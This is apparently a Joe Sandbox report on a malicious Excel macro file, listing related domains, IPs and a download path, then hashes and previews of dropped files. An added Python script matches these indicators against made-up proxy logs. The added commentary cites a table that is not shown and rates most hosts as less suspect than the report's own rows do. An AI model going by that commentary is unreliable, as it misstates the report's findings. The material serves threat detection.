                General Information

                Joe Sandbox Version:31.0.0 Emerald
                Analysis ID:383151
                Start date:07.04.2021
                Start time:10:46:01
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 6m 28s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:document-933340782.xlsm
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:10
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal88.expl.evad.winXLSM@11/12@5/5
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .xlsm
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Found warning dialog
                • Click Ok
                • Found warning dialog
                • Click Ok
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

Match            Associated Sample Name / URL   Detection   Context
143.95.33.96     document-767588369.xlsm        malicious   thirdstringcalifornia.com/ds/2803.gif
                 document-767588369.xlsm        malicious   thirdstringcalifornia.com/ds/2803.gif
                 document-1529481003.xlsm       malicious   thirdstringcalifornia.com/ds/2803.gif
                 document-1848958962.xlsm       malicious   thirdstringcalifornia.com/ds/2803.gif
                 document-1848958962.xlsm       malicious   thirdstringcalifornia.com/ds/2803.gif
                 document-227495331.xlsm        malicious   thirdstringcalifornia.com/ds/2803.gif
                 document-227495331.xlsm        malicious   thirdstringcalifornia.com/ds/2803.gif
                 document-2112297424.xlsm       malicious   thirdstringcalifornia.com/ds/2803.gif
                 document-2112297424.xlsm       malicious   thirdstringcalifornia.com/ds/2803.gif
                 document-693432745.xlsm        malicious   thirdstringcalifornia.com/ds/2803.gif
                 document-693432745.xlsm        malicious   thirdstringcalifornia.com/ds/2803.gif
                 document-570232986.xlsm        malicious   thirdstringcalifornia.com/ds/2803.gif
                 document-509173130.xlsm        malicious   thirdstringcalifornia.com/ds/2803.gif
                 document-570232986.xlsm        malicious   thirdstringcalifornia.com/ds/2803.gif
                 document-1569269334.xlsm       malicious   thirdstringcalifornia.com/ds/2803.gif
                 document-509173130.xlsm        malicious   thirdstringcalifornia.com/ds/2803.gif
                 document-1569269334.xlsm       malicious   thirdstringcalifornia.com/ds/2803.gif
                 document-65789758.xlsm         malicious   thirdstringcalifornia.com/ds/2803.gif
                 document-2074639396.xlsm       malicious   thirdstringcalifornia.com/ds/2803.gif
                 document-65789758.xlsm         malicious   thirdstringcalifornia.com/ds/2803.gif
66.36.231.40     document-767588369.xlsm        malicious   nellaimasthanbiryani.com/ds/2803.gif
                 document-767588369.xlsm        malicious   nellaimasthanbiryani.com/ds/2803.gif
                 document-1529481003.xlsm       malicious   nellaimasthanbiryani.com/ds/2803.gif
                 document-1848958962.xlsm       malicious   nellaimasthanbiryani.com/ds/2803.gif
                 document-1848958962.xlsm       malicious   nellaimasthanbiryani.com/ds/2803.gif
                 document-227495331.xlsm        malicious   nellaimasthanbiryani.com/ds/2803.gif
                 document-227495331.xlsm        malicious   nellaimasthanbiryani.com/ds/2803.gif
                 document-2112297424.xlsm       malicious   nellaimasthanbiryani.com/ds/2803.gif
                 document-2112297424.xlsm       malicious   nellaimasthanbiryani.com/ds/2803.gif
                 document-693432745.xlsm        malicious   nellaimasthanbiryani.com/ds/2803.gif
                 document-693432745.xlsm        malicious   nellaimasthanbiryani.com/ds/2803.gif
                 document-570232986.xlsm        malicious   nellaimasthanbiryani.com/ds/2803.gif
                 document-509173130.xlsm        malicious   nellaimasthanbiryani.com/ds/2803.gif
                 document-570232986.xlsm        malicious   nellaimasthanbiryani.com/ds/2803.gif
                 document-1569269334.xlsm       malicious   nellaimasthanbiryani.com/ds/2803.gif
                 document-509173130.xlsm        malicious   nellaimasthanbiryani.com/ds/2803.gif
                 document-1569269334.xlsm       malicious   nellaimasthanbiryani.com/ds/2803.gif
                 document-65789758.xlsm         malicious   nellaimasthanbiryani.com/ds/2803.gif
                 document-2074639396.xlsm       malicious   nellaimasthanbiryani.com/ds/2803.gif
                 document-65789758.xlsm         malicious   nellaimasthanbiryani.com/ds/2803.gif

                Domains

Match                             Associated Sample Name / URL   Detection   Context
holmesservices.mobiledevsite.co   document-767588369.xlsm        malicious   103.68.166.129
                                  document-767588369.xlsm        malicious   103.68.166.129
                                  document-1529481003.xlsm       malicious   103.68.166.129
                                  document-1848958962.xlsm       malicious   103.68.166.129
                                  document-1848958962.xlsm       malicious   103.68.166.129
                                  document-227495331.xlsm        malicious   103.68.166.129
                                  document-227495331.xlsm        malicious   103.68.166.129
                                  document-2112297424.xlsm       malicious   103.68.166.129
                                  document-2112297424.xlsm       malicious   103.68.166.129
                                  document-693432745.xlsm        malicious   103.68.166.129
                                  document-693432745.xlsm        malicious   103.68.166.129
                                  document-570232986.xlsm        malicious   103.68.166.129
                                  document-509173130.xlsm        malicious   103.68.166.129
                                  document-570232986.xlsm        malicious   103.68.166.129
                                  document-1569269334.xlsm       malicious   103.68.166.129
                                  document-509173130.xlsm        malicious   103.68.166.129
                                  document-1569269334.xlsm       malicious   103.68.166.129
                                  document-65789758.xlsm         malicious   103.68.166.129
                                  document-2074639396.xlsm       malicious   103.68.166.129
                                  document-65789758.xlsm         malicious   103.68.166.129
tienda.ventadigital.com.ar        document-767588369.xlsm        malicious   31.170.166.139
                                  document-767588369.xlsm        malicious   31.170.166.139
                                  document-1529481003.xlsm       malicious   31.170.166.139
                                  document-1848958962.xlsm       malicious   31.170.166.139
                                  document-1848958962.xlsm       malicious   31.170.166.139
                                  document-227495331.xlsm        malicious   31.170.166.139
                                  document-227495331.xlsm        malicious   31.170.166.139
                                  document-2112297424.xlsm       malicious   31.170.166.139
                                  document-2112297424.xlsm       malicious   31.170.166.139
                                  document-693432745.xlsm        malicious   31.170.166.139
                                  document-693432745.xlsm        malicious   31.170.166.139
                                  document-570232986.xlsm        malicious   31.170.166.139
                                  document-509173130.xlsm        malicious   31.170.166.139
                                  document-570232986.xlsm        malicious   31.170.166.139
                                  document-1569269334.xlsm       malicious   31.170.166.139
                                  document-509173130.xlsm        malicious   31.170.166.139
                                  document-1569269334.xlsm       malicious   31.170.166.139
                                  document-65789758.xlsm         malicious   31.170.166.139
                                  document-2074639396.xlsm       malicious   31.170.166.139
                                  document-65789758.xlsm         malicious   31.170.166.139
kristen.sbddev.com                document-767588369.xlsm        malicious   50.23.112.133
                                  document-767588369.xlsm        malicious   50.23.112.133
                                  document-1529481003.xlsm       malicious   50.23.112.133
                                  document-1848958962.xlsm       malicious   50.23.112.133
                                  document-1848958962.xlsm       malicious   50.23.112.133
                                  document-227495331.xlsm        malicious   50.23.112.133
                                  document-227495331.xlsm        malicious   50.23.112.133
                                  document-2112297424.xlsm       malicious   50.23.112.133
                                  document-2112297424.xlsm       malicious   50.23.112.133
                                  document-693432745.xlsm        malicious   50.23.112.133
                                  document-693432745.xlsm        malicious   50.23.112.133
                                  document-570232986.xlsm        malicious   50.23.112.133
                                  document-509173130.xlsm        malicious   50.23.112.133
                                  document-570232986.xlsm        malicious   50.23.112.133
                                  document-1569269334.xlsm       malicious   50.23.112.133
                                  document-509173130.xlsm        malicious   50.23.112.133
                                  document-1569269334.xlsm       malicious   50.23.112.133
                                  document-65789758.xlsm         malicious   50.23.112.133
                                  document-2074639396.xlsm       malicious   50.23.112.133
                                  document-65789758.xlsm         malicious   50.23.112.133

                ASN

Match              Associated Sample Name / URL   Detection   Context
ASMALLORANGE1US    P&I_Circularpdf.exe            malicious   173.237.136.115
                   P_I_Circularpdf.exe            malicious   173.237.136.115
                   document-767588369.xlsm        malicious   143.95.33.96
                   document-767588369.xlsm        malicious   143.95.33.96
                   cGlrfwymND.exe                 malicious   173.237.136.21
                   lC72iEZYZ3.exe                 malicious   173.237.136.21
                   SQMrG4GNtt.exe                 malicious   173.237.136.115
                   7ioqXtpxzB.exe                 malicious   173.237.136.115
                   LSttFMPFxl.exe                 malicious   173.237.136.115
                   document-1529481003.xlsm       malicious   143.95.33.96
                   document-1848958962.xlsm       malicious   143.95.33.96
                   document-1848958962.xlsm       malicious   143.95.33.96
                   document-227495331.xlsm        malicious   143.95.33.96
                   document-227495331.xlsm        malicious   143.95.33.96
                   8D19uC6H6A.exe                 malicious   173.237.136.115
                   INV2102-MDRTCL.xlsx            malicious   173.237.136.115
                   document-2112297424.xlsm       malicious   143.95.33.96
                   document-2112297424.xlsm       malicious   143.95.33.96
                   document-693432745.xlsm        malicious   143.95.33.96
                   document-693432745.xlsm        malicious   143.95.33.96
HOPONE-GLOBALUS    document-767588369.xlsm        malicious   66.36.231.40
                   document-767588369.xlsm        malicious   66.36.231.40
                   document-1529481003.xlsm       malicious   66.36.231.40
                   document-1848958962.xlsm       malicious   66.36.231.40
                   document-1848958962.xlsm       malicious   66.36.231.40
                   document-227495331.xlsm        malicious   66.36.231.40
                   document-227495331.xlsm        malicious   66.36.231.40
                   document-2112297424.xlsm       malicious   66.36.231.40
                   document-2112297424.xlsm       malicious   66.36.231.40
                   document-693432745.xlsm        malicious   66.36.231.40
                   document-693432745.xlsm        malicious   66.36.231.40
                   document-570232986.xlsm        malicious   66.36.231.40
                   document-509173130.xlsm        malicious   66.36.231.40
                   document-570232986.xlsm        malicious   66.36.231.40
                   document-1569269334.xlsm       malicious   66.36.231.40
                   document-509173130.xlsm        malicious   66.36.231.40
                   document-1569269334.xlsm       malicious   66.36.231.40
                   document-65789758.xlsm         malicious   66.36.231.40
                   document-2074639396.xlsm       malicious   66.36.231.40
                   document-65789758.xlsm         malicious   66.36.231.40
SOFTLAYERUS        aOD4c6uiV1.dll                 malicious   159.8.59.84
                   aOD4c6uiV1.dll                 malicious   159.8.59.84
                   ENwVO75IW4.dll                 malicious   159.8.59.84
                   ENwVO75IW4.dll                 malicious   159.8.59.84
                   ybY8r7nypB.dll                 malicious   159.8.59.84
                   ybY8r7nypB.dll                 malicious   159.8.59.84
                   kl3L1Z2vN1.dll                 malicious   159.8.59.84
                   kl3L1Z2vN1.dll                 malicious   159.8.59.84
                   Q2klIT2Lxi.dll                 malicious   159.8.59.84
                   Q2klIT2Lxi.dll                 malicious   159.8.59.84
                   ND4Leoxv8g.dll                 malicious   159.8.59.84
                   ND4Leoxv8g.dll                 malicious   159.8.59.84
                   e4su48a5fv.dll                 malicious   159.8.59.84
                   e4su48a5fv.dll                 malicious   159.8.59.84
                   Egt0vC029Z.dll                 malicious   159.8.59.84
                   Egt0vC029Z.dll                 malicious   159.8.59.84
                   nJ4zHoRqe5.dll                 malicious   159.8.59.84
                   PaymentInvoice.exe             malicious   75.126.101.233
                   nJ4zHoRqe5.dll                 malicious   159.8.59.84
                   GTqzqMZdvD.dll                 malicious   159.8.59.84
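
The Contacted IPs table and the Context tables above give the network indicators a responder would hunt for: five hostnames, five IPs (only holmesservices.mobiledevsite.co / 103.68.166.129 is marked malicious by the sandbox) and the /ds/2803.gif path requested by every related document-*.xlsm analysis. The script below is an added example, not part of the Joe Sandbox report, that applies those indicators to web-proxy log lines. It matches hostnames including subdomains, matches destination IPs, matches the URL path on its own, and reports a confidence level, because the four non-malicious IPs sit in hosting-provider address space (see the ASN names) where a match on IP alone is a weak signal. The log lines and their format ('timestamp client_ip dst_ip method url') are constructed for the example.

```python
"""Match the network indicators from this report against web-proxy log lines.

Added example; not part of the Joe Sandbox report. Indicator values are copied
from the report's Contacted IPs table and Context section. The log lines at the
bottom are constructed, in the format '<timestamp> <client_ip> <dst_ip> <method> <url>'.
"""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# Hosts and IPs the sample contacted. The sandbox marks only
# holmesservices.mobiledevsite.co / 103.68.166.129 as malicious; the rest are
# hosting-provider space the sample also touched, so they are low confidence.
IOC_HOSTS = {
    "thirdstringcalifornia.com": "low",
    "nellaimasthanbiryani.com": "low",
    "kristen.sbddev.com": "low",
    "tienda.ventadigital.com.ar": "low",
    "holmesservices.mobiledevsite.co": "high",
}
IOC_IPS = {
    ipaddress.ip_address("143.95.33.96"): "low",
    ipaddress.ip_address("66.36.231.40"): "low",
    ipaddress.ip_address("50.23.112.133"): "low",
    ipaddress.ip_address("31.170.166.139"): "low",
    ipaddress.ip_address("103.68.166.129"): "high",
}
# URL path requested by the related analyses listed under Context.
IOC_PATHS = {"/ds/2803.gif"}


@dataclass(frozen=True)
class Hit:
    line_no: int
    client_ip: str
    reasons: Tuple[str, ...]
    confidence: str


def host_matches(hostname: str) -> Optional[str]:
    """Return the indicator host that `hostname` equals or is a subdomain of."""
    labels = hostname.lower().rstrip(".").split(".")
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in IOC_HOSTS:
            return candidate
    return None


def match_request(url: str, dst_ip: str) -> Tuple[Tuple[str, ...], str]:
    """Return (reasons, confidence) for one request; reasons is empty if clean."""
    reasons: List[str] = []
    levels = set()
    parts = urlsplit(url)
    host = host_matches(parts.hostname or "")
    if host:
        reasons.append("host:" + host)
        levels.add(IOC_HOSTS[host])
    try:
        ip = ipaddress.ip_address(dst_ip)
    except ValueError:
        ip = None  # malformed destination field; skip the IP check
    if ip in IOC_IPS:
        reasons.append("ip:" + str(ip))
        levels.add(IOC_IPS[ip])
    if parts.path in IOC_PATHS:
        reasons.append("path:" + parts.path)
        levels.add("low")  # a path alone is a weak but useful pivot
    return tuple(reasons), ("high" if "high" in levels else "low")


def scan_log(lines) -> List[Hit]:
    """Run every log line through match_request and collect the hits."""
    hits = []
    for n, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) < 5:
            continue  # malformed line
        _ts, client_ip, dst_ip, _method, url = fields[:5]
        reasons, confidence = match_request(url, dst_ip)
        if reasons:
            hits.append(Hit(n, client_ip, reasons, confidence))
    return hits


# Constructed log lines (not from the report). Line 5 uses a host that is not an
# indicator but requests the same path, to exercise the path-only match.
SAMPLE_LOG = """\
2021-04-07T10:46:20Z 10.0.0.15 143.95.33.96 GET http://thirdstringcalifornia.com/ds/2803.gif
2021-04-07T10:46:21Z 10.0.0.15 50.23.112.133 GET http://kristen.sbddev.com/cgi-sys/suspendedpage.cgi
2021-04-07T10:46:22Z 10.0.0.15 103.68.166.129 GET http://holmesservices.mobiledevsite.co/
2021-04-07T10:47:01Z 10.0.0.22 93.184.216.34 GET http://example.com/index.html
2021-04-07T10:47:05Z 10.0.0.22 198.51.100.7 GET http://cdn.example.net/ds/2803.gif
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print(f"line {hit.line_no} {hit.client_ip} [{hit.confidence}] {', '.join(hit.reasons)}")
```

Running it flags lines 1, 2, 3 and 5; only line 3 comes out as high confidence. Block on the hostnames and the path first; block the four low-confidence IPs only after checking what else the hosting provider serves from them.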

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\suspendedpage[1].htm
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:HTML document, ASCII text, with very long lines
                Category:downloaded
                Size (bytes):7295
                Entropy (8bit):5.637267147483986
                Encrypted:false
                SSDEEP:192:ElVZHCkA26xd3Qk/uTtMy47R/Ga0kVhFuPwf8Pn9wHHyJS:EJ8VGaRF8I8K
                MD5:AFC83AE7C4EA82B533D9B8731AAB3E80
                SHA1:A77EB9C6E5472FE4A17385ACB32BF96C9F69A65F
                SHA-256:FDF900267092BC67BD7786B86C462E69F9ED52BED838809B6BA28B298BE879F6
                SHA-512:5CF249AFF46D7B7C1BE5F2F2CA3D771E6EEB9B85EF8D6CE8BB93DFEEB0957F9E8BF15FC4B57D98A19F76E49C51A68C957EDC6CB98CCC15AE3215BC326D968CF7
                Malicious:false
                Reputation:moderate, very likely benign file
                IE Cache URL:http://kristen.sbddev.com/cgi-sys/suspendedpage.cgi
                Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;. }. .additional-info {.
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2D8BBC4.png
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                Category:dropped
                Size (bytes):557
                Entropy (8bit):7.343009301479381
                Encrypted:false
                SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                MD5:A516B6CB784827C6BDE58BC9D341C1BD
                SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7387CA72.png
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PNG image data, 485 x 185, 8-bit/color RGB, non-interlaced
                Category:dropped
                Size (bytes):34789
                Entropy (8bit):7.988267796017535
                Encrypted:false
                SSDEEP:768:+D5XH0YsPc/wBfkpz/srsnYlCO20quHVkKAPH+leFbMLezAIt:+D5XUYz/wBf8orsEwHKynWLmAQ
                MD5:13CE435F07ADD2BEABD4A860755B489D
                SHA1:6CB356E6EA48633D56B49E578039818E493D364F
                SHA-256:AA2172D7F8454BEF43575C8877FCA816254D49BE7A9AF420B0C7FEE0169058E4
                SHA-512:E3E0C4541C1299494E8BC5C597E5913B06A1D481E125241C538D634CE2119BFCED14424C2E537A9EE036927E9955688D914DC56550E83B683B2D065E67FA037C
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: .PNG........IHDR..............i......sRGB.........pHYs..........+......IDATx^....]U.?.L....$...........`....}..kY]{].+....!H...:IHH.u2..?wN.>^...d2I.%.3..{....9..;....NUOO..J5.j`.h.......{.G6l....y..k......|gGG....;...y.:.#.8b...z@j.*.....R...........Y.}....k........---~...{v...G...5r..1.....>.h..h..c...z.B...R.. E..9X5.g....M.._.L...}.5.....;....?.....p j .....R.......p.....C..{..>..=......?.y.{..._...L.R]].O_..>.4...`k.T.....;w.o...;.c.......@w......:u.3........OO!{.t>x^....i.T.A...|.w....U......{..mC.1......+..K._dH_:..H.z.u........>.......^C.AR....\}..x.+.M.6HDJ...H.z..7-..........?|....|..6....(Ke...o..._..I.&..`z......VKe...Z...o~s.u.-[..a..d......w...o{...PF.......vJ..0........o...T.......s.y.;.q.e...................D.@j$5.......z ..O..>|..W^...~PTd?...3.5...`l.T......q.......O..S?.P..........|..kMMMf.x..wt......-..7...Z.=...........6..K.5..H.z ...k.i`..0.R3..l.....b..2}.tQ-.f.<y.9s.MCm..".3_....[.n./h{...?I.z...+V.
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\75F3850F.png
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
                Category:dropped
                Size (bytes):8301
                Entropy (8bit):7.970711494690041
                Encrypted:false
                SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
                MD5:D8574C9CC4123EF67C8B600850BE52EE
                SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
                SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
                SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D5F5A0F5.png
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                Category:dropped
                Size (bytes):848
                Entropy (8bit):7.595467031611744
                Encrypted:false
                SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                MD5:02DB1068B56D3FD907241C2F3240F849
                SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                C:\Users\user\AppData\Local\Temp\C1DE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):108482
                Entropy (8bit):7.912405123821417
                Encrypted:false
                SSDEEP:3072:GJrWNPTGqT+dY71DzPjEwqtDxNko+bJ99K7meX7pr2:GGPTGa08NjYDp+d9imeX7pr2
                MD5:75D5EBE3BB27E63BB7B1B3BFAD5466B0
                SHA1:17E6B14CCF5F5F650F3C1241DFFD4C1E53E5EE3A
                SHA-256:E2B376D8A9093A89C3427258C2A52BF5B35030144F74295A4B130F17E9C9B464
                SHA-512:27AA12625B373CA99F02D080681BD4B51A6AB1C5DCC8B6E15CAF5D87DBDC1A418472DA0B3B5BC16133B8A5611AA20D84154DC8141D615AB2054A7087B4C2CF0A
                Malicious:false
                Preview: .U.N.0..#.?D....#4j.b........mb./..h..k7.......>......."j.Zv.LX.Nz.]..wW.9.0.....Z..d...'.u....e}J.7.({........G+.....B.E..l2..w.\.S.`.._X.{....].8.k.?...T.D.FK..(.pjG.........D.`. ....&DM...R.`..^...Mm..|}?"........%..:.O*.B^9...G.....F.t-,..W.?...{.l...2-..`..Xc......Z..=;<.T.....;$.>$../').#>.....y..m..za.....b.}S.D..x..|.f$8.......1.^DP...t...^s..PQ<f.|......c.4.n..H.4.....=.]."..4l....U...q....y.+P{.yy.........PK..........!...`.............[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Apr 7 16:46:39 2021, atime=Wed Apr 7 16:46:39 2021, length=12288, window=hide
                Category:dropped
                Size (bytes):867
                Entropy (8bit):4.47926401566195
                Encrypted:false
                SSDEEP:12:85QMNa3LgXg/XAlCPCHaXgzB8IB/6UxuX+Wnicvb3bDtZ3YilMMEpxRljKg1yTdK:85py/XTwz6IwYefDv3qXqrNru/
                MD5:64C9E07A23ED6F71462819388A106F9B
                SHA1:949D424E51372DC171CBF44657A5C356BE9F4802
                SHA-256:C300CFCAA84EF8230D11DEAA7F7D385AD4C42DDAF986484706914384F8D35014
                SHA-512:02CF2701B62DDEC413A2C29358FD20EB24064E1E4F5414BE7A9BE3339D5B7DAFED98C3BE13F1816EC26DFF35CBDA4347BE1E130784A4CCDE26C97A37B64A8BAC
                Malicious:false
                Preview: L..................F...........7G....T..+....T..+...0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R...Desktop.d......QK.X.R.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\830021\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......830021..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-933340782.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Apr 7 16:46:39 2021, atime=Wed Apr 7 16:46:39 2021, length=108482, window=hide
                Category:dropped
                Size (bytes):2118
                Entropy (8bit):4.53890434678891
                Encrypted:false
                SSDEEP:24:8V/XTwz6IknpTNe3RBtDv3qXqdM7dD2V/XTwz6IknpTNe3RBtDv3qXqdM7dV:8V/XT3IkpZMHsaQh2V/XT3IkpZMHsaQ/
                MD5:80F9BD0D08F74462CBB9348AE22D2EF9
                SHA1:1207BA7A83F0D892BF874DA10098F18E21DF9EFE
                SHA-256:4C38DB76F6983416C691A348FBA03714F8BE499ADFA1F8F2993507A5FCC48B50
                SHA-512:33302294ADBE7A95CBCAA0BF10F70BCDFFA06B74F156F1A1A3D2880D4D4CB916B17BDAD8FAD3D4543516E6DCE90E174828225337C8934D7FAFDFD26CA70687DE
                Malicious:false
